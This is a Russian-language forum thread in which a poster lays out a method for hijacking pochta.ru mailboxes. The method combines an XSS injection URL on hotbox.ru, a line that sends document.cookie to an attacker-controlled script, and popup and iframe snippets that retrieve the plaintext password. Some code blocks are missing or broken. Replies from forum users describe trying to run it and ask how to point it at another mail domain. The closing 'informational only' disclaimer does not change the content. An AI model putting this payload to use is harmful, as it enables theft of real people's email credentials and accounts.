![]() |
Захват ящика на pochta.ru
Система там такая: Если пользователь при входе ставит галочку "запомнить” (что является обязательным условие взлома) и входит в ящик, то ему посылаются cookie, далее его перебрасывает в его ящик. При повторном заходе сервер, получив cookie, подставляет в поле с паролем собственно сам пароль в открытом виде. Следовательно, наша задача получить cookie.
Проблема заключается в том, что при попадании в ящик сервер перекидывает нас в домен типа www2.pochta.ru www3.pochta.ru и т.д. Значит, нам придётся использовать всплывающие окна: 1) На главной странице сервера присутствует xss-уязвимость: Код HTML:
http://hotbox.ru/info.php?"><script src=http://adres_skripta.js></script>Код HTML:
img=new Image();img.src="http://adres/skript.php?"+document.cookie;Что бы соблюсти синтаксис метода showModelessDialog(), сделаем редирект php скриптом(redirect.php): PHP код:
Код HTML:
<html><body onload="setTimeout(' main() ',1001)">(Взял от сюда: http://www.xakep.ru/post/24994) Получив cookie, мы посылаем их серверу скриптом skript.php, который в ответ получает страницу с паролем (в поле pass, в атребут value), для удобства он вырезает только содержимое тега form и сохраняет в файл form.html PHP код:
Код HTML:
<iframe FRAMEBORDER=0 src='http://adres/popup.html'></iframe>Из-за всплывающих окон уязвимость является броузерозависимой, проверялась в IE 6 sp2, Mozilla/5.0 (в Opere не работает) P.S. ДАННАЯ ИНФОРМАЦИЯ НОСИТ ЧИСТО ПОЗНОВАТЕЛЬНЫЙ ХАРАКТЕР. НЕ ПРИМЕНЯЙТЕ ЕЁ. Автор: Mayor |
Значит получилось?
Ну молодец. Удачи! |
Чето у меня не получилось(
Вот что показывает когда открываеш skript.php : Warning: fread(): supplied argument is not a valid stream resource in /www2/s/sa/*.fatal.ru/site/123/skript.php on line 7 Warning: feof(): supplied argument is not a valid stream resource in /www2/s/sa/*.fatal.ru/site/123/skript.php on line 6 |
Цитата:
|
Дык это понятно)))
popup.html - это код №4 Только в нем надо менять http://www.hotbox.ru/info.php?mid=\"\>\ например на http://www.front.ru/info.php?mid=\"\>\ да? В остальных файлах: adres_skripta.php ))) redirect.php skript.php надо менять только путь, да? На папку скрипта надо ставить права 777 да? |
Цитата:
Цитата:
|
| Время: 15:47 |